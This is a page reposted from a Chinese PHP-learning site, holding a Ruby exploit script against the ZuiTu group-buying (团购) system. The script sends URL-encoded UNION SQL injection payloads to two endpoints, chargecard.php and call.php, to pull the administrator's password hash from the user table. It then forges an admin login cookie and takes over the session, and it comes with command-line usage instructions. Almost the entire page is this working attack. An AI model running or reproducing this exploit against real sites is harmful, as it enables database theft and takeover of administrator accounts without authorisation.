来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 这次获取hash用的不是盲注require net/httprequire urirequire #39;digest/md5#39;doc =HERE-------------------------------------------------------ZuiTu TuanGou System Inejction ExploitA......
|
这次获取hash用的不是盲注
require "net/http"
require "uri"
require 'digest/md5'
doc =<<HERE
-------------------------------------------------------
ZuiTu TuanGou System Inejction Exploit
Author:ztz www.2cto.com
Blog:http://ztz.fuzzexp.org/
-------------------------------------------------------
HERE
usage =<<HERE
Usage: ruby #{$0} host port path
example: ruby #{$0} demo.zuitu.com 80 /
HERE
def send(url, cookie='')
uri = URI(url)
http = Net::HTTP.new(uri.host, uri.port)
request = Net::HTTP::Get.new(uri.request_uri)
if cookie.length != 0
request.initialize_http_header({"Cookie" => "#{$cookie}"})
end
response = http.request(request)
return response.body
end
def encode64(bin)
[bin].pack("m")
end
def getpassword
exp1 = "http://#{$host}:#{$port}/#{$path}ajax/chargecard.php?action=query&secret=')%2F**%2Fand%2F**%2F1%3D2%2F**%2Funion%2F**%2Fselect%2F**%2F1%2C2%2Cconcat(username%2CCHAR(0x3d)%2Cpassword)%2C4%2C5%2C9999647600%2F**%2Ffrom%2F**%2Fuser%2F**%2Fwhere%2F**%2Fid%3D1;%23"
exp2 = "http://#{$host}:#{$port}/#{$path}api/call.php?action=query&num=1')%2F**%2Fand%2F**%2F1%3D2%2F**%2Funion%2F**%2Fselect%2F**%2F1%2C2%2C3%2Cconcat(username%2CCHAR(0x3d)%2Cpassword)%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2F**%2Ffrom%2F**%2Fuser%2F**%2Fwhere%2F**%2Fid%3D1%3B%23"
$password = send(exp1).scan(/\w{32}/)
if $password.length == 0
$password = send(exp2).scan(/\w{32}/)
end
end
def getsession
cname = Digest::MD5.hexdigest($host)[0, 4] + "_ru"
cvalue = "1@" + $password.join()
$cookie = cname + "=" + encode64(cvalue)
puts "[*]cookie: #{$cookie}"
uri = URI("http://#{$host}:#{$port}/#{$path}index.php")
http = Net::HTTP.new(uri.host, uri.port)
request = Net::HTTP::Get.new(uri.request_uri)
request.initialize_http_header({"Cookie" => "#{$cookie}"})
response = http.request(request)
$session = response["Set-Cookie"].scan(/PHPSESSID=\w+;/).join()
end
puts doc
if ARGV.length < 3
puts usage
else
$host = ARGV[0]
$port = ARGV[1]
$path = ARGV[2]
puts "[*]get administrator's hash..."
getpassword()
if $password.length == 0
puts "[-]Can't get administrator's hash..."
exit
end
puts "[+]hash: #{$password.join()}"
puts "[*]Inject into cookie..."
getsession()
if $session.length == 0
puts "[-]can't get cookie!"
end
puts "[+]set this cookie: #{$session}"
end
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
